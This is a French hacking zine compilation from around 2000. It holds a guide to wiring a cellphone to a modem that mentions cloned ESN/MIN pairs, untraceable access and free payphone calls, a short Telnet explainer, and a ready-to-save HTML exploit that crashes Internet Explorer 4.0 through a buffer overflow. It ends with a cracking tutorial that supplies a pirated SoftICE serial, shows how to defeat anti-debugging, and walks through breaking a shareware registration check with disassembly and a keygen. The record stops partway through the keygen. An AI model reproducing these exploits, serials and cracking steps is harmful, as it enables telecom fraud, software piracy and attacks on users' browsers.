La plupart des vrais hackers etrangers se sont deja tourne depuis pas mal de 
temps vers cette solution, qui leur permet
de ne pas se faire tracer tres facilement. 
Les paires d' Esn/min ne sont plus difficiles  obtenir et si utilises 
soigneusement durent beaucoup plus longtemps 
que des tlcartes, des codes et la plupart des autres mthodes de sabotage de 
tlphone. 
Ce texte explique comment relier facilement n'importe quel tlphone cellulaire 
 un modem, sans devoir acheter une 
interface de ligne cellulaire ou un dispositif semblable. Ce dont vous aurez 
besoin pour acomplir ce projet: 

1 tlphone de bureau
1 prise tlphonique male/femelle
2 morceaux de fil (30cm chacun) 
1 rouleau d' etain
1 ruban adhesif
Vous aurez besoin galement d'un fer  souder,
d' une pince  dnuder et 
d'un tournevis. 

Instructions: 
1. Ouvrez le combin de votre tlphone. Retirez le haut-parleur et le 
microphone du bti de plastique et coupez les 
fils qui y sont relis. 
2. Soudez maintenant les 30cm de fil sur les fils existants du haut-parleur et 
du microphone du combin. Une fois que 
vous avez fait ceci, resoudez simplement le haut-parleur et le microphone sur le 
cblage du combin tlphonique. 
3. Placez le haut-parleur du combin tlphonique sur le microphone de votre 
tlphone cellulaire et fixez le tout 
par du rhuban adhesif. Ceci tient non seulement le haut-parleur du combin 
tlphonique en position, mais empche 
galement des problmes de bruit de fond. 
4. Placez maintenant le microphone du combin tlphonique au-dessus du 
haut-parleur de votre tlphone cellulaire 
et enveloppez de rhuban adhesif.
Comment utiliser le dispositif: 
Fondamentalement, ce que vous avez fait est transformer votre tlphone de 
bureau en dispositif acoustique de type 
coupleur. Pour utiliser le dispositif, suivez simplement les instructions 
ci-dessous. 
1. Branchez votre double prise de tlphone  votre tlphone. Branchez votre 
modem dans l' autre prise.
2. Laissez votre tlphone dcroch, jusqu'  ce que la ligne soit morte 
(c.--d. jusqu'  ce que ca sonne occup).
3. Composez le numro de modem que vous voulez appeler sur votre portable, et 
pressez OK. 
4.1. Si vous voulez composer un numro de modem type bbs ou vax/vms, tapez Atd 
dans votre terminal et pressez entrer. 
Votre modem devrait maintenant attendre un signal convoyeur de votre tlphone 
cellulaire. 
4.2. Si vous voulez composer le numro d' un provider internet, configurez votre 
acces rseau distant en connexion 
manuelle, cela permet  l' utilisateur de composer manuellement sur le tlphone 
connect sur votre modem le numro 
 composer, puis lorsque le numro est compos, cliquez sur 'connexion', et 
votre modem se connectera tout seul comme
un grand  la porteuse.

Diagramme du dispositif:                                              __
                                             :  :
                                             :  :
                                     ________:__:_
    ______                          :             :
   /      :                       /::    :::::    :
  /       :---+   +--------------: ::   :::::::   : haut-parleur
 /        :-+ :   : +------------: ::    :::::    :
:     ____: : :   : :             \::  _________  :
:    /      : :   : :               : :         : :
:   :       : :   : :               : :_________: :
:   :       : :   : :               :             :
:   :       : +-- : : ---------+    :  [1][2][3]  :
:   :       +---- : : -------+ :    :  [4][5][6]  :
:   :             : :        : :    :  [7][8][9]  :
:   :             : :        : :    :  [*][0][#]  :
:   :             : :        : :    :   _  _  _   :
:    \____        : :        : :    :  [_][_][_]  :
:         :       : :        : :  /::             :
 \        :-------+ :        : +-: :: :::         : microphone
  \       :---------+        +---: :: :::         :
   \______:                       \::             :
      :                             :_____________:      :
      :                            telephone cellulaire      :

telephone de bureau  Comment cela fonctionne: 
Le signal convoyeur du modem  distance sera envoy du haut-parleur de votre 
tlphone cellulaire et dans le 
microphone du combin tlphonique. Votre modem recevra toutes les donnes 
envoyees dans le combin tlphonique 
aprs que la commande Atd ait t mise (respectivement, que vous ayez lance la 
connexion en mode manuel de 
l'acces reseau distant pour le net). 
De la mme manire, tous les signaux convoyeurs de votre modem seront envoys du 
haut-parleur du combin tlphonique 
vers le microphone du tlphone cellulaire. Au moment ou je vous ecris, je ne me 
suis pas connecte a des vitesses plus
elevees que 2400 bauds, mais ceux utilisant de bons portables et de bons reseaux 
(la, on comprend l' utilite du son 
Digital ;) ne devraient avoir aucun probleme pour se connecter  plus hauts 
dbits (pas du 14.4 kan meme!).
Je n'ai pas crit ce texte pour que les gens l'employent a transfrer de grandes 
quantits de donnes a grande 
vitesse. C'est simplement un guide pour expliquer  quel point il est facile 
d'utiliser n'importe quel tlphone 
cellulaire avec un modem. 2400 bauds peuvent tre lents, mais il est trs bien 
pour hacker des vax/vms, appeler 
votre BBS souterrain favori ou transferer des fichiers des textes, envoyer des 
emails...
Vous pouvez egalement utiliser ce dispositif pour connecter un ordinateur 
portable relie a un modem PCMCIA sur le 
combin d' une cabine tlphonique. L' avantage serait dans ce cas de pouvoir 
muler une carte de telephone, pour 
ne rien payer (allez BOB, au travail!!).
Je vous fais confiance pour adapter cette technique a vos besoins...


             \ _://                         \\:_ /
            _)\\//(_                       _)\\//(_                      
---------- \\_o\/o_/      CyRiUsViRuS      \_o\/o_// ----------
             ||||||          2000           ||||||
             '||||'                         '||||'
                           CyriuSoft (c)
contact me : <a onmouseover="window.status='Add cyriusvirus@yahoo.fr to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=cyriusvirus@yahoo.fr&nf=0">cyriusvirus@yahoo.fr</a>

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



     *********************
     * Telnet decortique *
     *********************

Auteur : tRaSH

- Telnet dcortique : telnet permet une communication bidirectionnel (A=&gt; B et 
B=&gt; A), sur une base d'octet de 8 bits.
Les connections sont en TCP intercale de squences telnet. Ce protocole est base 
sur trois principes : 
1. le network virtual terminal, qui permet un change standard sans pour cela 
retenir toutes les spcifications de 
l'autre machine
2. Les options ngocies, "do, don't, will, won't " (je fais, je ne fais pas, 
fais, ne fais pas) sert pour, par 
exemple, un terminal rcent et un plus ancien, de profiter de toutes le confort 
du rcent sans en rester pour 
cela a du nvt.
Voicis un schma d'une demande d'option x :A :Do x =&gt; B
B :will x =&gt;  A, alors l'option x est accepte et mise en action par les deux 
units. 
3. Une vue symtrique de chaque extrmit (terminal,), c--d que chaque unit 
suit des regles pour eviter des erreurs
que voicis : 
- chaque unite ne doit envoyer une requete que pour le changement d'option, pas 
pour, par indique dans quel mode on se trouve
- si une unite recoit une requete lui demandant de changer de mode alors qu'il 
est deja dans ce mode, cette unite ne
doit pas repondre pour eviter les boucles infinies 
- si une requete  pour modifier le mode dont les donnes doivent etre traite pour 
la transmission est envoyee, elle 
doit etre emise a l'endroit o la transmission change de mode.
De nombreuses requete d'options vont surement s'entrecroiser lors d'un 
connection, chacune des deux unite essayant 
d'obtenir le mellieur service de l'autre unite.

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


	*************************************************
	* Buffer Overrun de Microsoft Internet Explorer *
	*************************************************

Auteur : wHyAnGeL 
Date : 04.08.00 
Titre : Buffer overrun de Microsoft Internet Explorer (MSIE) 
Tout d'abord qu'est-ce qu'un buffer overrun ? Le buffer c'est la zone pour le stickage temporarire dans la mmoire de la machine . Et l'overrun c'est un envahissement, un dbordement. Combinez les deux et vous avez la rponse. 

Microsoft Internet Explorer (la version 4.0, je n'ai pas test les autres) peut tre crash et enventuellement faire excuter un code arbitraire avec le tag <EMBED>. 

Le voici : <EMBED SRC=file://C|/A.ET_200_AUTRES_CARACTERES_ICI_> 

Il ouvre une bote de dialogue et ferme IE 4.0. 

Il semble que cette longue extension de fichier cause un overrun au stack. (note : le stack c'est la zone dans la mmoire o il est possible de stocker de l'information et de la rcuprer en ordre inverse  celui de l'entre). 

Maintenant, le stack est compltement crash avec ses propres valeurs, EIP aussi et CS=SS. 
On pourrait certainement construire une string (ligne) et l'excuter  partir de la machine client, c'est  dire vous. 

A vous de voir ce que vous pouvez faire avec cet exploit. 

-----------------------coupez ici et enregistez sous 
crashmsie.html--------------------- 
<HTML> 
Trying to crash IE 4.0 
<EMBED 
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789> 
                                                               40 
80                                                                               160                    170                 180                 190          200 
</HTML> 
  
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________

  
  


     ****************************
     * Tutorial de cracking n3 *
     ****************************

Auteur : GRIm@

---------------------------------------
-                        Underground Production                 
               -
-                  LES NEWBIES D'AUJOURD'HUI SONT LES 3L33T3 DE DEMAIN           
               -
--------------------------------------
&lt;--------------------TAILLE IDEALE,800x6000-------------------------&gt;


   CRACKING_BEGINNER n03             by GRIm@, L'Apprenti Sorcier


0)INTRO:

Salut, nous revoil parti pour la suite de nos aventures !! Au menu cette 
fois-ci:
- Installer SoftIce...
- Configurer SoftIce..
- Commandes dans SoftIce...
- Les indispensables de SoftIce...
- SoftIce, SoftIce, SoftIce....
- Un Chti crack pour rester dans le mouvement
NB: Si vous ne connaissez rien au cracking, il est indispensable de lire les n 
01 et 02 (et
    mme comme ca, ca vas tre DUR ! =-).. )

1) SoftIce en lui-mme:

H oui, vous aez compris, aujourd'hui nous allons parler de SoftIce... Mais 
qu'est ce donc que SoftIce ? 
Sous ce nom trange au consonnace trange, se cache l'outils prfr des 
crackerz,
LE dbuggeur absolu... H oui, car SoftIce est un dbuggeur, il permet de tracer 
des programmes directement 
pendant leurs xcution tout en voyant leur code assembleur... Cet outil est 
indispensable, et mme s'il fait 
parfois peur aux newbies, il vous rendra de grand service...
En fait SoftIce doit se lancer AVANT windoze, il sert en quelque sorte de 
sous-couche  celui-ci ce qui lui permet 
d'assurer des fonctions  de dbuggage trs pratiques et nottament des breakpoint 
sur les APIs...

2) SoftIce Install et Config

On vas commencer par le dbut, l'installer (pour le trouver c'est facile, 
www.numega.com): Il vous demande d'abord un 
chti srial, facile voici pour la version 4.01: 5103-00009B-9B...
Aprs, vous dcider du rpertoire d'installation ainsi que du type de config, 
choissisez selon votre config 
(perso j'vous conseille d'utiliser les vga driver default pour votre carte 
graphique, sinon vous serez emmerd !)...
Quand il demande si vous voulez modifier autoexec.bat, dites non ! Aprs 
l'install, aller ajouter ecs lignes  la fin
de votre autoexec.bat:

------------------CUT CUT CUT------------------
@echo off
C:\WINDOWS\COMMAND\choice /T:n,05 Lancer SoftIce ?
if errorlevel 2 goto fin
c:\SOFTICE\WINICE.EXE rem : il faut remplacer le chemin par celui de l'install
:fin
------------------CUT CUT CUT------------------

Pour ceux qui sont pas fort en scripting, au lancement, l'ordi demandera si vous 
voulez lancer SoftIce et au bout 
de 5 sec il choisira non (comme ca pas besion de rester  cot de l'ordi au 
moindre reboot...). Une fois ceci fait, 
il ne vous restera qu'a redmarrer votre ordinateur et  choisir oui quand il 
demandera si on veut avoir SoftIce 
(sinon  quoi ca sert ?!)...
Tant que vous y tes, vous devez aller aussi modifier dans le rep d'install le 
fichier winice.dat selon votre config 
et vos dsir. Voici un exemple qui devrais foncionner:

------------------CUT CUT CUT------------------
PENTIUM=ON
NMI=ON
ECHOKEYS=OFF
NOLEDS=OFF
NOPAGE=OFF
SIWVIDRANGE=ON
THREADP=ON
LOWERCASE=OFF
WDMEXPORTS=OFF
MONITOR=0

PHYSMB=64       ; Mettre le nb de RAM
SYM=1024
HST=256
TRA=8
MACROS=32
DRAWSIZE=2048

INIT="LINES 60;CODE ON; X; FAULTS OFF;" ; Initialisation

F1="h;"
F2="^wr;"
F3="^src;"
F4="^rs;"
F5="^x;"
F6="^ec;"
F7="^here;"
F8="^t;"
F9="^bpx;"
F10="^p;"
F11="^G @SS:ESP;"
F12="^p ret;"
SF3="^format;"
CF8="^XT;"
CF9="TRACE OFF;"
CF10="^XP;"
CF11="SHOW B;"
CF12="TRACE B;"
AF1="^wr;"
AF2="^wd;"
AF3="^wc;"
AF4="^ww;"
AF5="CLS;"
AF8="^XT R;"
AF11="^dd dataaddr-&gt;0;"
AF12="^dd dataaddr-&gt;4;"
CF1="altscr off; lines 60; wc 32; wd 8;"
CF2="^wr;^wd;^wc;"

; WINICE.DAT
; (SIW95\WINICE.DAT)
; for use with SoftICE Versions greater than 3.0 (Windows 95)

; *************************************************************************
; If your have MORE than 32MB of physical memory installed, change
; the PHYSMB line to the correct # of Megabytes.
; If you have LESS than 32MB you can save a bit of memory by 
; specifying the correct # of Megabytes
; Example: PHYSMB=32
; *************************************************************************
; ***** Examples of sym files that can be included if you have the SDK *****
;     Change the path to the appropriate drive and directory
;LOAD=c:\windows\system\user.exe
;LOAD=c:\windows\system\gdi.exe
;LOAD=c:\windows\system\krnl386.exe
;LOAD=c:\windows\system\mmsystem.dll
;LOAD=c:\windows\system\win386.exe
; ***** Examples of export symbols that can be included *****
;     Change the path to the appropriate drive and directory
EXP=c:\windows\system\vga.drv
EXP=c:\windows\system\vga.3gr
EXP=c:\windows\system\sound.drv
EXP=c:\windows\system\mouse.drv
EXP=c:\windows\system\netware.drv
EXP=c:\windows\system\system.drv
EXP=c:\windows\system\keyboard.drv
EXP=c:\windows\system\toolhelp.dll
EXP=c:\windows\system\shell.dll
EXP=c:\windows\system\commdlg.dll
EXP=c:\windows\system\olesvr.dll
EXP=c:\windows\system\olecli.dll
EXP=c:\windows\system\mmsystem.dll
EXP=c:\windows\system\winoldap.mod
EXP=c:\windows\progman.exe 
EXP=c:\windows\drwatson.exe 
; ***** Examples of export symbols that can be included for Windows 95 *****
;     Change the path to the appropriate drive and directory
EXP=c:\windows\system\kernel32.dll
EXP=c:\windows\system\user32.dll
EXP=c:\windows\system\gdi32.dll
EXP=c:\windows\system\comdlg32.dll
EXP=c:\windows\system\shell32.dll
EXP=c:\windows\system\advapi32.dll
EXP=c:\windows\system\shell232.dll
EXP=c:\windows\system\comctl32.dll
EXP=c:\windows\system\crtdll.dll
EXP=c:\windows\system\version.dll
EXP=c:\windows\system\netlib32.dll
EXP=c:\windows\system\msshrui.dll
EXP=c:\windows\system\msnet32.dll
EXP=c:\windows\system\mspwl32.dll
EXP=c:\windows\system\mpr.dll
------------------CUT CUT CUT------------------

3) SoftIce Comment ca marche ?


3.1) Overlook

Bon maintenant finis de rigoler on vas regarder un peux comment marche ce fameux 
monstre... Quand vous tes dans 
windob, pour basculer sous softice, il suffit de faire CTRL-D (et inversment 
pour revenir  windob... N'ayez sourtout 
pas peur en voyant la "gueule" de l'interface, elle est certes sobre, mais trs 
ergonomique et puissante... La fentre
est spare en trois partie principale, (du moins normalement, sinon essayer ces 
commandes: wr on, wd on,...) la 
premire c'est celle des registres, vous vous rapelez, oui ces trucs bizzare qui 
on des nom zarbi commme eax, ebx, 
ecx, etc (ca c'est pas un registre)... Bon ben dans cette fentre on peut suivre 
en direct l'tat des registres, ou 
autrement dit, leurs valeurs (On y voit galement les flags, mais j'en parle 
pas).
La deuxime fentre, contient l'EIP (c'est le n de la ligne ou on est dans le 
prog) ansi que les instructions en 
hexa et en assembleur (si c'est pas le cas, essayer "code on"). On peut y suivre 
en direct le droulement du 
programme et ventuellement changer certaine instructions. On peut normalement y 
voir aussi le nom du programme 
qui est en train d'tre trac. La troisime fentre est celle des commandes, 
elle permet d'entrer et de voir 
l'historiques des commandes. SoftIce y affiche aussi diverses informations sur 
le chargement et le dchargement 
d'objet. Softice est aussi livr avec un utilitaire trs utile, le Loader. Ce 
programme fonctionne sous win et 
permet de lancer des applications, jusque l c'est pas extraordinaire, mais ce 
qui est pratique, c'est que les 
apps lance avec le loader s'arrte toute seule sur leur premire instructions 
et vous vous retrouvez dans 
SoftIce pour pouvoir la tracer depuis le dbut...

3.2) Commandes de base

Il existe plusieurs commandes que vous devez ABSOLUMENT connaitre par coeur, en 
voici quelques une expliques:
F5    Permet de re-lancer le programme (la mme chose que CTRL-D)
F6    Permet de placer le focus (votre curseur) sur le code ou de revenir dans 
les instructions
F8    Permet de tracer (avancer ligne par ligne) le programme. Quand on 
rencontre un call, on 
      rentre  l'intrieur, et donc on trace TOUTES les instructions
F10   Permet de tracer (avancer ligne par ligne) le programme. Quand on 
rencontre un call, on 
      ne rentre pas  l'intrieur, et on saute sur la prochaine ligne sans voir 
les instrucions
F12   Permet de tracer tout seul jusqu'au prochain ret (quand on est dans une 
routine (un call)
      et que on veut revenir  l'appel)
bpx   Permet de poser un breakpoint sur une ligne ou une API
bl    Permet d'afficher les breakpoint
bc    Permet d'effacer un breakpoint (faire bc [n du breakpoint])
bd    Dsactiver un breakpoint
be    Activer un breakpoint
r fl  Permet d'inverser un flag, souvent utilis avec r fl z pour transformer un 
JE en un JNE et
      inversment.
a     Permet d'diter le code assembleur. On peut remplacer les instructions du 
programmes par de
      nouvelles instructions (effectif seulement en mmoire, quand le prog se 
ferme, les modifs
      s'effacent)
line  Permet de choisir le nombre de ligne d'affichage (conseil, minimum LINES 
60)
ver   La version de SoftIce
hboot Permet de relancer l'ordi (utile en cas de plantage)
help  Permet d'affciher toutes les commandes ainsi qu'une explication sur 
celle-ci: [command] /?)

Bon, je crois que c'est tout, remarquez que cette liste est loin dtre 
exaustive...

4) Utiliser SoftIce

Bien, bien, on vas se faire un exemple thorique (en ce sens que ce n'est pas un 
exemple rel). On veut par exemple
cracker un programme qui aprs 30 jours nous affiche un message puis quitte. La 
technique du Dead-Listing 
(dssasemblage avec WDAsm et recherche dans les strings ref) n'ayant rien donn 
(ca arrive assez souvent 
malheureusement), on vas essayer avec SoftIce. Tout d'abord, on vas rflchir 
comment on vas procder: On pourrait 
utiliser le loader et tracer depuis le dbut, mais ce n'est pas une bonne idde, 
car il se peut qu'il y ai plein de 
routine avant que le message s'affiche. Non, rflchissez  ce que je vous ai 
dit tantot, avec SoftIce on peut poser 
des breakpoint sur les API de windows (ce sont les fonctions de windows qu'un 
prog peut utiliser). Or, quand notre 
prog nous affiche notre message de 30 jour dpass, il utilise une fonction de 
windows trs usite par (presque) 
tous les programmes, l'API messageboxa. On vas donc piger le prog par l ! Pour 
ce faire, il faut basculer sous 
SoftIce (CTRL-D) puis faire : bpx messageboxa Ensuite vous pouvez revenir sous 
win (re CTRL-D ou F5). A ce moment, 
il ne reste plus qu' lancer notre prog, et on se retrouve instantanment sous 
SoftIce qui nous afiche qu'un prog  
apell la fonction messageboxa. Bon tout ca c'est cool, mais c'est pas gnial, 
car on est pas dans notre prog, en 
effet on se trouve dans kernel32 (ou user32 je sais plus) qui est le noyau de 
windows. Pour revenir dans le prog 
qui a appel messageboxa, y'a pas 36 solutions, il faut utiliser F12 et souvent 
plusieurs fois. Aprs chaque F12, 
vous devriez voir que le prog actuellement visible change, il vous faut 
continuer a faire F12 jusqu' ce que vous 
soyez revenu dans le prog qui nous inrresse. Une fois l, vous devriez vous 
trouvez juste sur l'instruction aprs 
l'appel  l'API. A ce moment la, il ne reste plus qu'a retrouver le test 
(souvent juste au dessus) qui nous aurait 
viter ce dsagrable message d'erreur et qui aurait permis au prog de 
continuer. Une fois celui-ci trouv, il ne 
vous reste plus qu' noter son adresse, puis  aller avec votre diteur hexa 
favoris modifier le saut en consquence...

5) Les Outils de SoftIce


5.1) Le Loader

Bon, je vous en ai dj parl de ce truc, c'est le programme qui est livr avec 
SoftIce et qui permet de lancer un prog
pour le tracer avec SoftIce ds l'entry point (l'entry point, c'est l ou le 
programme excute la premire ligne)... 
Cet outil est assez utile (mme si parfois il ne marche pas, mais ca on en 
reparle au n4...) et trs simple 
d'utilisation. Pour lancer un programme, il suffit de faire file/load module, 
puis de slctionner un excutable. 
Ensuite, il ne reste qu'a clicker sur l'icne Load dans la barre d'icne pour 
que le programme se lance (il se peut 
qu'un message d'erreur apparaisse disant qu'une erreur est apparue lors de la 
traduction des symboles, rpondez oui 
et n'y pensez plus (moi j'ai ca pour tous les progs...).

5.2) Frog's Ice

Comment parler de SoftIce sans parler de frog's ice... Frog 's Ice permet 
d'empcher la dtection de SoftIce par 
certain programme (voir le point 6). Il est galement trs simple d'utilisation, 
il suffit de le lancer et il se 
cache dans la barre d'icone et plus besoin de rien faire... Il logge tous les 
tentatives de dtection et les fait 
chouer automatiquement... Le must, il se protge lui-mme contre la 
dtection... Vous pouvez aussi tre prvenu 
par un joli cran bleu de la mort de toutes tentative de dtection de SoftIce... 
La version 1.00 vient de sortir, 
donc n'hsitez surtout pas  aller le downloader, c'est un indispensable !

5.3) IceDump

IceDump, comme son nom l'indique est un dumper intgr  SoftIce, c'est  dire, 
un programme qui vas copier une 
partie de la mmoire pour le remettre dans un fichier... Dans sa dernire 
version (icedump 6.016 & nticedump 
1.8 2000/04/27), il est parfaitement intgr  SoftIce, en lui ajoutant des 
commandes et avec ses multiples 
options (y'a mme un player MP3)... Bref, IceDump est un programme  possder, 
mme si son utilisation reste 
rare avec le fameux ProcDump...

6) Dtection de SoftIce

A cause de son immense succs auprs des crackerz, certain malfaisant personnage 
ont eu l'ide d'intgrer une 
dtection de SoftIce dans leurs produits, empchant ainsi l'excution du prog si 
le dbuggeur tait en mmoire... 
Mais grce  un certain +Frog 's Print (une 3l33t3 comme y'en a pas deux, 
francophone en plus), un porg nomm 
Frog's Ice est apparu, faisant disparaitre ainsi ces quelques petit inconvnient 
(Voir 5.2)... Je ne pourrais 
pas parler ici de toutes les mthode anti SoftIce, mais je vais vous parlez de 
la plus connue, appele MeltIce. 
MeltIce historiquement est la premire mthode de dtection, puisque c'est celle 
que le Loader utilisait pour 
savoir si SoftIce tait prsent, quelque programmeurs rus ont eu envie de 
copier cette technique et ainsi est 
apparu MeltIce. Cette technique est assez simple, elle utilise l'API 
CreateFileA, et lui passe comme argument le 
fichier "\.\\SICE". Si softice est en mmoire, l'Api retourne quelque chose, 
sinon elle retourne 0 (la valeur de 
retour est dans eax). Il suffit aprs au programme de tester eax pour savoir si 
SoftIce est l ou pas... Pour se 
dbarraser de ca, il suffit de poser un breakpoint sur l'APi en faisant bpx 
createfilea. Cela peut servir, mais 
honnntement, Frog's Ice est amplement suffisant pour toutes les techniques de 
dtection (voir sa doc pour plus 
d'info...).

7) Un chti crack

Bha, fot bien rester un peux sur de la pratique, pas que de la thorie alors 
voici un pti crack
que j'avais fait il y a quelque mois pour [Zone14] (<a target="new" href="http://zone14.cjb.net">http://zone14.cjb.net</a>) et 
ou j'utilisait
SoftIce pour une des premire fois... Aller bonne lecture... !

------------CUT CUT 
CUT---------------------------------------------------------------

Quickeditor 1.7         Par GRIm@


Nom du Prog:             Quickeditor
Version :                1.7
Infection :              Nag, fonction protge
Outils :                 WDASM et (un peux) SoftIce
Niveau :                 Facile, Newbies expriment


Salut, voici la suite de mes aventures dans le monde du shareware. Alors, 
aujourd'hui on s'attaque  Quickeditor, 
un petit prog qui permet de crer des film au format Quicktime. Bref, c'est pas 
ca qui compte. Aujourd'hui aussi, 
et ce pour la premire fois, j'utiliserai SoftIce.
En fait, tant toujours un newbies, je n'avais jamais rellement utilis cet 
outils, donc si j'me goure quelque part,
soyez indulgent... 

Premire approche
-----------------
On installe le prog, et on regarde. Un nag au lancement, un menu register. On 
essaye un nom bidon, et l, ni message 
d'erreur, ni quoi que ce soit, juste les infos qu'on  entr qui s'efface. Mince 
alors, on vas pas pouvoir dsassembler
le prog et chercher dans les trings, 
y'en aura pas ! Comment faire ?

Premire Attaque
----------------
On ne se dcourage pas, et on dcide d'utiliser tout les outils  notre 
disposition,  savoir
notre cervaux (trs utile des fois), et SoftIce. Pour ceux qui ne connaisent 
absolument rien 
de SoftIce, sachez quand mme qu'il s'agit d'un dboggeur, et je vous invite  
lire de la
documentation sur celui-ci (dispo sur le net, ou en demand  
<a onmouseover="window.status='Add grima@hotmail.com to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=grima@hotmail.com&nf=0">grima@hotmail.com</a>). On lance le
programme avec le Symbol Loader, et SoftIce breake, on est dans le prog. 
La-dessus, on appuie
sur F5, et on laise continuer l'excution. On clicke sur register, on rentre de 
fausses infos,
puis avant de clicker sur ok, on bascule dans SoftIce (CTRL-D). Il nous faut 
maintenant poser
un breakpoint pour que le programme s'arrte pendant la vrification du srial. 
Une des 
solutions reste de mettre un break sur HMEMCPY; c'est plutot radical. Pour ce 
faire, il suffit
d'entrer la commande "BPX HMEMCPY". Ensuite, cacher SoftIce (avec un nouveau 
CTRL-D), et cliquer 
sur le bouton ok. Ca ne tarde pas, SoftIce breake immdiatement et on se 
retrouve dans le code. 
Seulement voil, il y a un problme, on est pas dans le code de l'application on 
est dans celui 
de KERNEL32. Pour revenir dans SoftIce, il suffit d'appuier plusieurs fois sur 
F12 pour que le 
nom de l'application apparaisent en bas du premier cadre. Une fois que vous y 
tes, il suffit 
de tracer avec F9. On arrive vite  un endroit intressant, au alentour de 
00401CD6. Il ne nous 
reste qu'a noter l'adresse, et  dsassembler le prog avec WDASM. Une fois ceci 
fait, vous aller 
 l'adresse que vous avez note, et vous observez ceci:

* Possible Reference to Dialog: DialogID_0084, CONTROL_ID:03EB, ""
|
:00401C23 68EB030000 push 000003EB
:00401C28 55 push ebp

* Reference To: USER32.GetDlgItemInt, Ord:00F4h
|
:00401C29 FF1508654300 Call dword ptr [00436508]
:00401C2F 8D4C2418 lea ecx, dword ptr [esp+18]
:00401C33 6A0F push 0000000F
:00401C35 51 push ecx
:00401C36 8BF8 mov edi, eax

* Possible Reference to Dialog: DialogID_0084, CONTROL_ID:03EC, ""
|
:00401C38 68EC030000 push 000003EC
:00401C3D 55 push ebp
:00401C3E 897C2440 mov dword ptr [esp+40], edi

* Reference To: USER32.GetDlgItemTextA, Ord:00F5h
|
:00401C42 FF15FC644300 Call dword ptr [004364FC]
:00401C48 8BD8 mov ebx, eax
:00401C4A 6683FB06 cmp bx, 0006
:00401C4E 0F8C82000000 jl 00401CD6
:00401C54 6683FF0A cmp di, 000A
:00401C58 7C7C jl 00401CD6
:00401C5A 663BDE cmp bx, si
:00401C5D 7E29 jle 00401C88
:00401C5F 8D7C2418 lea edi, dword ptr [esp+18]

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401C82(C)
|
:00401C63 8A17 mov dl, byte ptr [edi]
:00401C65 52 push edx
:00401C66 E875460100 call 004162E0
:00401C6B 8BCE mov ecx, esi
:00401C6D 83C404 add esp, 00000004
:00401C70 0FAFC8 imul ecx, eax
:00401C73 8B442414 mov eax, dword ptr [esp+14]
:00401C77 03C1 add eax, ecx
:00401C79 46 inc esi
:00401C7A 47 inc edi
:00401C7B 663BF3 cmp si, bx
:00401C7E 89442414 mov dword ptr [esp+14], eax
:00401C82 7CDF jl 00401C63
:00401C84 8B7C2430 mov edi, dword ptr [esp+30]

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401C5D(C)
|
:00401C88 663B7C2414 cmp di, word ptr [esp+14]
:00401C8D 7518 jne 00401CA7
:00401C8F 6A01 push 00000001
:00401C91 55 push ebp

* Reference To: USER32.EndDialog, Ord:00B4h
|
:00401C92 FF1510654300 Call dword ptr [00436510]
:00401C98 B801000000 mov eax, 00000001
:00401C9D 5F pop edi
:00401C9E 5E pop esi
:00401C9F 5D pop ebp
:00401CA0 5B pop ebx
:00401CA1 83C41C add esp, 0000001C
:00401CA4 C21000 ret 0010

On vois parfaitement que le prog fait appel  deux APIs, GetDlgItemInt et 
GetDlgItemTextA, qui
serve respectivement  retrouver un nombre et un texte d'une boite de dialogue. 
A votre avis, 
que rcupre donc l'application, sinon un code et un nom ? =-). Juste aprs, 
l'application
effectue une srie de test pour vrifier si le nom faitg au moins 6 caractres, 
et que le code
est plus grand que 10 (y'a aussi une autre valeur teste, mais je sais pas c'est 
quoi !). 
Ensuite, se trouve une drle de routine, qui se rappelle elle-mme. En gros, 
voici en
"pseudo-code" ce que l'app fait:
saisie du nom
Boucle le_nombre_de_lettre
saisie_d'une_lettre
Appel d'une fonction(lettreposition) /* cette fonction est un peux longue, sinon 
je l'aurais
                                     /* mise, elle recoit en argument une 
lettre, et renvoie 
                                     /* un chiffre pour cette lettre
multiplication de la valeur rcupre par la position dans la chaine /* la 1er 
lettre=position 0
incrmentation d'une variable avec la valeur prcdante
continue_boucle si_nombre_de_lettre diffrent_de nombre_total_de_lettre
test valeur_entre, valeur calcule /* on teste le code entr avec le code 
calcul.

En gros, le schma n'est pas trs difficile, il suffit de connaitre la valeur 
assigne  chaque
lettre puis de multiplier cette valeur par la position de chaque lettre dans le 
nom, et enfin
d'additionner toute ces valeurs pour obtenir un srial. Comme c'est assez 
simple, nous allons
raliser un petit KeyGen. Voici les sources de ce KeyGen fait en Visual Basic, 
text1 reprsente
l'entre du nom, et text2, le srial:

Private Sub Command1_Click()
Dim longeur As Integer, position As Integer, valeur As Integer
Dim caractere As String, serial As Integer
If Text1.Text = "" Then Exit Sub
longeur = Len(Text1.Text)
If longeur &lt; 6 Then
MsgBox "Votre nom doit faire au moins 6 caractre", vbApplicationModal, "Espce 
de Lamer ;-)"
Exit Sub
End If
Do Until position = longeur
caractere = Mid(Text1.Text, position + 1, 1)
valeur = GetNumer(caractere)
valeur = valeur * position
serial = serial + valeur
position = position + 1
Loop
Text2.Text = Str(serial)
End Sub

Private Function GetNumer(lettre As String) As Integer
Select Case UCase(lettre)
Case "A"
GetNumer = 1
Case "B"
GetNumer = 6
Case "C"
GetNumer = 5
Case "D"
GetNumer = 4
Case "E"
GetNumer = 2
Case "F"
GetNumer = 6
Case "G"
GetNumer = 7
Case "H"
GetNumer = 12
Case "I"
GetNumer = 9
Case "J"
GetNumer = 10
Case "K"
GetNumer = 19
Case "L"
GetNumer = 12
Case "M"
GetNumer = 13
Case "N"
GetNumer = 14
Case "O"
GetNumer = 15
Case "P"
